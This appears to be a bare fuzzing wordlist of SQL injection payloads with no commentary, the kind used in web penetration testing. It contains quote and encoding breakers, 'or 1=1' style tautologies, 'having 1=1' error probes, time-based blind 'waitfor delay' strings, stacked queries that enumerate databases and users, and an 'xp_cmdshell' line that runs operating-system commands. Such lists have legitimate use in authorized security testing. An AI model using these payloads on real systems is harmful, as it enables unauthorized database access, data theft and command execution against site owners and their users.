'
';
)
\'
;
\"
"
"'
'"
&#34
&#39
"' or 1=1 --
"' or 1=1 /*
%27
%22
%27%20—%20OR%201%3D1— 
%27+—+OR+1%3D1— 
" / %22
; / %3B
%%2727
%25%27
'" or 1=1 --
'" or 1=1 /*
'+HERP
'||'DERP
'+'herp
' ' DERP
value' OR
value' OR 5=5 OR 's'='0 
value' AND 5=5 OR 's'='0 
value' OR 5=0 OR 's'='0 
value' AND 5=0 OR 's'='0 
0+value
1 AND 5=5
1 AND 5=0
1 OR 5=5 OR 4=0 
1 OR 5=0 OR 4=0
value AND 5=5
value AND 5=0
value OR 5=5 OR 4=0 
value OR 5=0 OR 4=0
WF'SQL"Probe;A--B 
' having 1=1--
" having 1=1--
1 having 1=1--
\' having 1=1--
) having 1=1-- 
%a5' having 1=1-- 
|vol
'|'vol
"|"vol
||vol
va'+'lues
'+"+'
'+''+'
'+'somechars 
somechars'+'
somechars'||'
'||'somechars 
'||'
or 7659=7659
and 7659=7659
and 0=7659
/**/or/**/ 7659=7659
/**/and/**/ 7659=7659
/**/and/** /0=7659
' and 1 in (SELECT @@version) --
' and 'barfoo'= 'foobar' --
' or 'foobar'= 'foobar
' and 'foobar'= 'foobar' --
' and 'barfoo'= 'foobar' --
' or 'foobar'= 'foobar
' and 'foobar'= 'foobar' --
' and 'barfoo'='foobar') --
' and 'barfoo'='foobar
' or 'foobar'='foobar' --
' or 'foobar'='foobar') --
' and 'foobar'='foobar
' and 'foobar'='foobar') --
'' exec master.. xp_cmdshell 'vol'--
'; select * from dbo. sysdatabases--
'; select @@ version,1,1,1--
'; select * from master..sysmessages--
'; select * from sys.dba_users--
;waitfor delay '0:0:15';--
;waitfor delay '0:0:15';--
');waitfor delay '0:0:15';--
);waitfor delay '0:0:15';--
1','0');waitfor delay '0:0:15';--
1,'0');waitfor delay '0:0:15';--
1','0','0');waitfor delay '0:0:15';--
1,'0','0');waitfor delay '0:0:15';--
1','0','0','0');waitfor delay '0:0:15';--
1,'0','0','0');waitfor delay '0:0:15';--
1','0','0','0','0');
waitfor delay '0:0:15';--
foo')--
foo', 1)--
foo', 1, 1)--
foo', 1, 1, 1)--